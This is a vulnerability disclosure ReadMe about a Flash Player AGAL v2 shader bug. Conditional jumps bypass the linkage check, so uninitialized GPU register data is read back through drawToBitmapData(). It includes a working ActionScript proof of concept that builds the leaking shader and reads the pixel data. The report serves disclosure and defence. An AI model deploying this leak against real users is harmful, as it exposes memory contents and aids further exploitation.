
Issue 238 attachment: ReadMe.txt (2.1 KB)

1. Adobe Flash Player Information Disclosure Vulnerability

This is an interesting bug related to AGAL, the Adobe Graphics Assembly Language used for Stage3D shaders (http://www.adobe.com/devnet/flashplayer/articles/what-is-agal.html).

The HelloTriangleColored project is Adobe's sample that draws a single colored triangle with Stage3D (http://www.adobe.com/devnet/flashplayer/articles/hello-triangle.html).

The HelloTriangleColoredError project removes "mov v0, va1" from the vertex shader, so the varying register "v0" is never written. The Flash Player projector content debugger raises this error when the program is uploaded:

Error: Error #3632: AGAL linkage: Varying 0 is read in the fragment shader but not written to by the vertex shader.
at flash.display3D::Program3D/upload()
at HelloTriangleColoredError/initMolehill()

In other words, the linkage check is what stops a fragment shader from copying an unwritten varying into the output color register "oc".

Adobe introduced AGAL v2 in Flash Player 14 (https://forums.adobe.com/thread/1493673).

AGAL v2 adds conditional instructions (forward jumps), which can be used to bypass the linkage check.

The HelloTriangleColoredLeak project wraps "mov v0, va1" in a conditional block whose condition is never satisfied, so at run time "v0" is still never written.

However, the linkage check is static: it sees a write to "v0" in the vertex shader and accepts the program, so the fragment shader ends up storing an uninitialized value to the output register "oc", which can lead to information disclosure.

On Windows 8.1 x64, the triangle drawn by HelloTriangleColoredLeak.swf was black and its color changed dramatically.

Context3D supports drawToBitmapData() (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/display3D/Context3D.html), so the rendered pixels, and with them whatever the unwritten varying contained, can be read back into ActionScript.
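The following ActionScript 3 program is an added example that reconstructs the three vertex-shader variants described above (the Adobe sample, the "Error" variant with the write removed, and the "Leak" variant with the write wrapped in a never-true AGAL v2 conditional) and reads the result back with drawToBitmapData(). It is not the attached HelloTriangleColored* projects or Adobe's code. Assumptions not taken from the ReadMe: the constant register vc4 and its values used for the never-true "ife" comparison, the "ife"/"eif" syntax of the AGAL v2 AGALMiniAssembler, the 256x256 back buffer, and the class name. It only demonstrates the uninitialized-varying readback; the pointer-leak tricks mentioned below are not attempted.

```actionscript
package {
    import com.adobe.utils.AGALMiniAssembler;
    import flash.display.BitmapData;
    import flash.display.Sprite;
    import flash.display3D.Context3D;
    import flash.display3D.Context3DProfile;
    import flash.display3D.Context3DProgramType;
    import flash.display3D.Context3DVertexBufferFormat;
    import flash.display3D.IndexBuffer3D;
    import flash.display3D.Program3D;
    import flash.display3D.VertexBuffer3D;
    import flash.events.Event;
    import flash.geom.Matrix3D;

    // Added example: reconstructs the three vertex-shader variants the ReadMe
    // describes. Not the attached projects and not Adobe's sample code.
    public class AgalLinkageDemo extends Sprite {
        private var ctx:Context3D;

        // Vertex shader as in Adobe's HelloTriangleColored sample.
        private static const VS_OK:String =
            "m44 op, va0, vc0\n" +
            "mov v0, va1\n";

        // HelloTriangleColoredError: the write to v0 is removed, so
        // Program3D.upload() rejects the pair with Error #3632.
        private static const VS_ERROR:String =
            "m44 op, va0, vc0\n";

        // HelloTriangleColoredLeak: the write to v0 sits inside an AGAL v2
        // conditional that never holds (vc4.x = 0, vc4.y = 1; register and
        // values are assumptions of this example). The static linkage check
        // still sees a write to v0 and accepts the program.
        private static const VS_LEAK:String =
            "m44 op, va0, vc0\n" +
            "ife vc4.x, vc4.y\n" +
            "mov v0, va1\n" +
            "eif\n";

        // Fragment shader shared by all variants: copy the varying to the color output.
        private static const FS:String = "mov oc, v0\n";

        public function AgalLinkageDemo() {
            // AGAL v2 requires the Stage3D standard profile (Flash Player 14+).
            stage.stage3Ds[0].addEventListener(Event.CONTEXT3D_CREATE, onContext);
            stage.stage3Ds[0].requestContext3D("auto", Context3DProfile.STANDARD);
        }

        // Assemble both shaders as AGAL v2 and upload them; null if linkage fails.
        private function buildProgram(vs:String):Program3D {
            var va:AGALMiniAssembler = new AGALMiniAssembler();
            var fa:AGALMiniAssembler = new AGALMiniAssembler();
            var program:Program3D = ctx.createProgram();
            try {
                program.upload(va.assemble(Context3DProgramType.VERTEX, vs, 2),
                               fa.assemble(Context3DProgramType.FRAGMENT, FS, 2));
            } catch (e:Error) {
                trace("upload rejected: " + e.message);   // Error #3632 for VS_ERROR
                return null;
            }
            return program;
        }

        private function onContext(e:Event):void {
            ctx = stage.stage3Ds[0].context3D;
            ctx.configureBackBuffer(256, 256, 0, false);

            // Triangle as in the Adobe sample: x, y, z, r, g, b per vertex.
            var verts:Vector.<Number> = Vector.<Number>([
                -0.3, -0.3, 0, 1, 0, 0,
                 0.3, -0.3, 0, 0, 1, 0,
                 0.0,  0.3, 0, 0, 0, 1]);
            var vb:VertexBuffer3D = ctx.createVertexBuffer(3, 6);
            vb.uploadFromVector(verts, 0, 3);
            var ib:IndexBuffer3D = ctx.createIndexBuffer(3);
            ib.uploadFromVector(Vector.<uint>([0, 1, 2]), 0, 3);

            ctx.setVertexBufferAt(0, vb, 0, Context3DVertexBufferFormat.FLOAT_3); // va0: position
            ctx.setVertexBufferAt(1, vb, 3, Context3DVertexBufferFormat.FLOAT_3); // va1: color
            ctx.setProgramConstantsFromMatrix(Context3DProgramType.VERTEX, 0,
                new Matrix3D(), true);                         // vc0..vc3: identity
            ctx.setProgramConstantsFromVector(Context3DProgramType.VERTEX, 4,
                Vector.<Number>([0, 1, 0, 0]), 1);             // vc4: x != y, "ife" never holds

            buildProgram(VS_ERROR);                            // rejected by the linkage check
            var leak:Program3D = buildProgram(VS_LEAK);        // accepted despite unwritten v0
            if (leak == null) return;

            ctx.setProgram(leak);
            ctx.clear(1, 1, 1);
            ctx.drawTriangles(ib, 0, 1);

            // Read the frame back. With VS_OK the center pixel is a blend of the
            // vertex colors; with VS_LEAK it is whatever the varying register held.
            var bmp:BitmapData = new BitmapData(256, 256, false);
            ctx.drawToBitmapData(bmp);
            trace("center pixel: 0x" + bmp.getPixel32(128, 128).toString(16));
            ctx.present();
        }
    }
}
```

Swapping VS_LEAK for VS_OK in the setProgram() call gives the reference rendering to compare against; the pixel read back for VS_LEAK is the observable the ReadMe describes (black, varying from run to run), not a fixed value.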

According to the Project Zero article "What does a pointer look like, anyway?", it might be possible to leak a pointer with some tricks (http://googleprojectzero.blogspot.com/2014/08/what-does-pointer-look-like-anyway.html).

I think Chris is good at such tricks :P.

These have been tested with Flash Player Projector 16.0.0.235 on Windows 8.1 x64.

Chrome also reproduces the issue, but make sure that the GL_RENDERER in use qualifies for the Stage3D standard profile, which AGAL v2 requires (http://blogs.adobe.com/flashplayer/2014/09/stage3d-standard-profile.html).

2. Credit

Jihui Lu of KeenTeam (@K33nTeam) is credited for this vulnerability.